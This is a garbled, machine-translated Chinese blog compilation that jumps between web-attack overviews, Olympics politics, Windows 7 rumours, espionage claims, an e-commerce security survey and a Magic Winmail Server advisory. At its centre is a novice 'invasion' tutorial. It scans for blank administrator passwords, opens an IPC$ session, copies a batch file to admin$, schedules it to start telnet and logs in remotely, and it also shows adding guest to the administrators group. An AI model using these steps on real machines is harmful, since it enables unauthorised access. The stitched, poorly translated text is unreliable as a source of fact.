Why, then, ordinary firewall Zuzhibule such attacks?  Because such attacks disguised as normal traffic, not particularly large data packets, address, and no suspicious contents do not match, so it will not trigger alarms. Most people fear is an example of SQL commands embedded attacks (SQL injection). In such attacks, hackers use one of your own HTML form, unauthorized query the database. Another threat is that the Executive Order. As long as Web applications to send commands to the shell program, the crafty hackers on the server can be arbitrary enforcement of the order.

Some other attacks is relatively simple. For example, HTML Notes inside often contain sensitive information, including imprudent programmers left login. Thus, for application-level attacks, tampering with cookies from the changes to HTML form, the hidden field, depends entirely on the imagination of hackers. But the good news is that most of these attacks is completely blocked.

The Chinese government on the confidence of the Beijing Olympic Games, the issue of security into a huge human and material resources, but Beijing people now in private discussions with many people attacked Beijing on the topic, the Chinese Government has not come forward to explain this issue. For example, many people in the last debate about more than 5,000 kilograms of explosives were transported into Beijing in early August, attacks have taken place in Xinjiang and Chinese soldiers in the incident, about 16 Chinese soldiers died. China’s Yunnan and Guizhou have taken place in the public riots.

Beijing Olympic Games in such a complex moment organized, and we look forward to the success of the organization, attacked the Olympic Games, I think the world of any peace-loving people will oppose and condemn. It is now - at 11:00 on August 8, 2008, where the world will never wrote to the wishes of peace and quiet.

We found several problems exist Chinese website, CN domain names had reached the incredible price point, a large number of viruses and spam have a website in China, so China’s Internet Wuyanzhangqi, Chinese website traffic has increasingly valuable, many individuals Webmaster difficult.

The Chinese government intervention in the network has been growing, the site requires registration, e-shop requirement of registration, licenses and other video sites need. Large Chinese website of copyright is a serious problem, leading Chinese Internet content on a high degree of duplication.

China’s telecommunications network is also very serious intervention, many of the room suddenly closed down, suspended, over more than 2,000 servers were closed off gateway processing, network for this incident, I also have the concept of wait-and-see attitude. In China, ordinary people have to speak to the right, no right to discuss the government and the monopoly of right or wrong.

Unfortunately, the number of users to buy Vista is not satisfied with the Microsoft, Vista’s main sales from Microsoft’s OEM partners pre-installed systems. Even so many companies still choose to have your own decision to install Vista or XP, many users unwilling to give up because they are familiar with the old operating system, especially the software and they all still work perfectly functioning of the time.

Clock at the Windows 7.0 ─ ─ Vista (based on the NT kernel is known as Windows 6.0) successor. Windows 7 still usher in time, but some preliminary characteristics has gradually surfaced: The new streamlined core, built-in virtual machine to run the old software, the revised and simplified the user interface ……

Perhaps you would say not have a name is Vienna Mody » Forget it bar, the new Microsoft vice president Steven Sinofsky has stopped in accordance with the scenery of the past, the city named after the way. So Windows 7 in what name will eventually appear in public, is still unknown, especially in the experienced Me, XP, Vista these strange name.

But as we look at the news, Sinofsky might return to the most primitive in accordance with the naming of the year, so as Windows95. After all, Microsoft’s other products are in accordance with the rules of, such as Office software, such naming is no bad.

If this speculation, then it will be the name of Windows 2010. Windows 7 the first time since the official in the mouth, is in Orlando in July of Microsoft Exchange global sales meeting. A spokesman said: Microsoft has made Windows 7 for the three-year development plan. This means that the earliest it will have to wait until 2010 will be published.

U.S. media reported that the United States and the West, China adopted a “human sea tactics.” Spies who are amateur spies, general by the Chinese overseas students or overseas Chinese living in member. China will require them to any military, science and technology or the information back to the domestic economy, no matter how low-level intelligence. Its purpose is the collection of such information together is likely to become an important intelligence. Security expert John Pike said: “The Chinese should not fight homers and their theory is that if you do enough, will one day be big results.” Some people predict that about 100,000 people involved in the ” Human sea tactics. ”

I think that we are willing to hackers in the United States and technical exchanges, such exchanges are not necessarily attacking one another, I think the political struggle between the countries, and on the network hacker attacks, and must not associate reason.

For U.S. media, CNN reported from Tibet, many Chinese people has lost the trust of the American media, the same people of the United States deal with this report, I do not know what attitude » We believe that China’s hacking by the Chinese Government does not control, the Chinese government intelligence officer in the action, I believe that most Chinese people are not aware of the hackers.

Below started! Note: This article is only suitable for novice, has to look at the entry-level technical articles! Below I just used the knowledge to know that you made the first successful! Operating system installed to a windows2000.

Section 1 lesson: the use of order

You have to understand some order to better use! Can not look at one side of the invasion Liwen it, the following look at some commonly used on the orders! Invasion is the basic need to know how to order if you do not see this even if you The school can take your vacation to go!

1.net

NET [ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW]

Above that net orders. We look at some commonly used.

net user \ \ list of all users \ \ example: c: \> net user

net localgroup \ \ of the user group \ \ example: c: \> net localgroup administrators guest / add \ \ guest users to add management group. the need for adequate access to operate! \ \

net share \ \ show that the sharing of resources \ \ example: c: \> net share

net start \ \ launch services, has launched a service or display a list of \ \ examples: \> net start examples: \> net start telnet \ \ start telnet \ \

net stop \ \ stop Windows2000 network services \ \ example c: \> net stop telnet \ \ stop telnet services \ \

net time \ \ Show Time \ \ example: c: \> net time 127.0.0.1 \ \ show 127.0.0.1 time \ \

net use \ \ displayed on the computer connected to the information \ \ example: c: \> net use

net view \ \ domain list shows, computer list or by the designated computer is shared resources \ \ example: c: \> net view

The basic order on the net come to the end! However, the order is not to say that others do not have to learn! just my basic teaching (the invasion) the need for such an order is only to help where their windows to look at it! DOS under the Basic order is very important! Such as: copy, and so on. Ftp, and so on are important for various reasons to order you to look at. (Basic courses can not be too complicated, OK ?!!!) a good school ~ ~

Section II Division: port and Trojans

A. Section II to this course of the first lessons we learn through the port! What is the port »computer is connected to the outside world and access! Such as we do with the page is actually 80 ports.

1), telnet sign in the port (23/tcp)
The message log shows that long-distance services are running, where you can log in to the remote host.

2), WWW (80/TCP) port
It shows that the WWW service in the port operation
Do not tell me you do not know what WWW service is oh, that is to say, if a site’s server has 80 ports.

3), FTP (21/tcp)
ftp services and TELNET services, you can get from FTP server or upload information such as Trojans, some anonymous or landing, but this seems not a good thing.

4), finger (79/tcp) port
finger services on the invaders is a very useful information from its users get information, view the machines running, and so on.

5), remote control (3389)
This port for remote landing.

There are some common ports such as 110135139,25 ….. and so on and so we need to use the Essentials 23 is the port. Other important because it also cited that out. Remaining to fill your own Meeting. (I am not irresponsible. Courses is the question! Understanding please!) PS: not all the ports are useful.

B. Trojan

Trojan is a great danger! Such as glaciers, and other Trojans can even remote control your computer! Trojans will also open some ports. You can see through ports to see if there is no Trojan horse on your computer running. But Some Trojans are already using the port. This is more trouble. Need to use antivirus software to help the ~ \ \ We do not need to use the curriculum to the Trojans. But I think you deserve a school \ \

Section III classes: ipc invasion.

Better to estimate the basis of so many of you saw something very impatient to have this lesson to you to implement the first invasion! Keke to put aside your AK-47, we do not need that guy ….

A. What is the ipc?

IPC $ share is “named pipe” of resources, its procedures for communication between the very important. In the remote management of computer and view your computer’s shared use of resources. We can use IPC $ host with the goal of establishing an empty connection (without user name and password), while the use of this air link, we can get on the target host User list. “Streamer” IPC $ detection feature, users can get a list and can meet the dictionary, password attempts.

B. OK! You use in the last two lessons learned knowledge with me Chong! Good grasp of your orders to use the right »

The need to use the scanning software: xscan operating system: win2000 (Do not tell me that you or 98 or me, I immediately K you!)

First of all, we use a scanner scan of the IP. Open xscan, select “Settings” and then choose “scanning module”, and then only weak passwords nt of the election of that. Identified after the election “set up”, “scan parameters” and then fill in IP Paragraph. 127.0.0.1-127.0.0.255 on! (Note: IP paragraph is purely fictional.)

So we have to assume that a .127.0.0.2 the user name: Administrator Password: Air (Oh really Gao Buqing now to the people so why not safety awareness …)

Open cmd, enter: net use \ \ 127.0.0.1 \ ipc $ “” / user: “Administrator” the successful completion of orders. OK! Next ~

at \ \ 127.0.0.1 \ \ this step is purely personal habits because I would like to know that he did not open the AT. did not give up on a bar \ \

Next we need to edit a batch file. Notepad open, enter the following: @ net start telnet and then save it as a a.bat \ \ Note extensions! A bat! \ \

Edited to continue after it! Copy a.bat \ \ 127.0.0.1 \ admin $ \ \ admin $ winnt is on target the root directory under \ \

net time \ \ 127.0.0.1 \ \ look at the objectives of the time! useful ~ \ \

Assumption is 21:00. Then the next step!

at \ \ 127.0.0.1 20:01 a.bat \ \ goal of an AT command to run a.bat. time to pay attention to the 24-hour system! \ \

net time \ \ 127.0.0.1 \ \ not the time to look at the «\ \

To assume that, we will implement the next step!

telnet 127.0.0.1 \ \ landing on the other side of the machine.’s just that batch is to open its ports to 23 \ \

Then enter the user name and password \ \ user is Administrator ah! Password is empty. Enter on the line ~ \ \

OK! Every success! Now you can do the things you want to add users, etc. For example, (an order is the use ah! Order so that important!)

Qingtongxuemen attention not to remove other people’s things! We are just learning techniques. Luandong I immediately who he was expelled.

Well-now you should be able to implement its first invasion to the actual operation of course not all as easy as above. Will be a lot of problems. For example, at the Executive can not. Telnet boost when the need to verify, and so on. This has left Your own solution to the ~

China’s Internet Center (CNNIC) “issued by the China Internet Development Report” on e-commerce survey results show that current users of the problem is most concerned about the safety of online transactions. This shows that e-commerce in China can develop smoothly, is an important prerequisite for the security of online transactions must be guaranteed.

Recently found that many Chinese e-commerce sites, there are some universal serious security flaws, an attacker can easily steal user account, the transaction password, users can use the funds to conduct online transactions. These security loopholes will directly affect the credibility of e-commerce site, the Chinese e-commerce development process will have a significant impact.

Here classified the five loopholes in the design, for example, some Web sites that users to have a different domain name a new page to remind users not, it allows users to not know whether this new page trusted; Some sites will require Users log in from a non-secure Web site to the safety, so that hackers can take advantage of organic, because hackers can modify non-secure web page, go to the login page of insecurity on the page.

Some sites will be safety recommendations or contact information posted on the website of the non-security, hackers can often unsafe counterfeit these pages and provide various recommendations and contact information; some Web sites used by the user’s personal information on the policies not enough Sound, for example, allows users to set a short password or by e-mail account as the use of account; The study also considered the financial institutions to make use of email passwords is dangerous, because not many users have e-mail security.

Some sites in insecure login page to provide functional, some contacts and other corporate information is published in the pages of insecurity, and some sites allow users to set up e-mail account for the use of account, only a handful of Site no loopholes in the design.

Magic Winmail Server is a multi-function WEB-based mail service program.

Magic Winmail Server existence of a number of security issues, remote attackers can use these loopholes to upload files to download arbitrary conduct cross-site scripting and other attacks.

1, WEBMAIL loopholes

a, download.php allow directory traversal download any file, because of the lack of adequate filtering parameters, the system can lead to download any file.

b, upload.php users because of the lack of full file name filters, available through directory traversal upload any documents to the system.

c, e-mail users showed that personal information when there cross-site scripting vulnerability. ‘/ admin / user.php’ script allows WEB administrator user name, full name, description and company name, malicious users can use the script userinfo.php insert malicious script to personal information, see the administrator, can lead to sensitive information Leak.

2, IMAP long-distance services directory traversal vulnerability

IMAP order multiple directory traversal problems exist, can lead to malicious user to read arbitrary board users open e-mail, delete, and the establishment of any directory. These orders include CREATE, EXAMINE, SELECT and DELET.

3, FTP PORT ordered a security issue

Winmail Server service does not correct the FTP PORT order to provide the IP address, can lead to an attacker to use PORT order a port scan.

Manufacturers patch:

At present vendors have released updates to fix this security issue, go to vendors to download the home page: http://www.magicwinmail.net